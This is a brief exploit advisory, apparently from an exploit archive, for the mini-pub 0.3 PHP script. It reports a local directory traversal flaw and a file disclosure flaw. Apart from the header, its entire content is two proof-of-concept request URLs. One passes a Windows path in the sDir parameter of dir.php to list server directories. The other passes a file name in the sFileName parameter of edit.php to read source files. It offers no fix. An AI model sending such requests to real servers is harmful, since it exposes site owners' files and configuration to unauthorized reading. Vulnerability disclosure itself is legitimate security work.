id: 3880
date: 10/11/2008
title: mini-pub 0.3 Local Directory Traversal / File Disclosure Vulnerabilities
author: GoLd_M
cves: 

========================================================================
mini-pub 0.3 Local Directory Traversal / File Disclosure Vulnerabilities
========================================================================


mini-pub.php <= v0.3 Local Directory Traversal / File Disclosure Vulnerabilities
Script : http://mini-pub.sourceforge.net/
I- Local Directory Traversal
POC : /mini-pub.php-0.3/front-end/dir.php?sDir=C:\AppServ\MySQL

II- File Disclosure 
POC : /mini-pub.php-0.3/front-end/edit.php?sFileName=edit.php



#  0day.today [2023-03-22]  #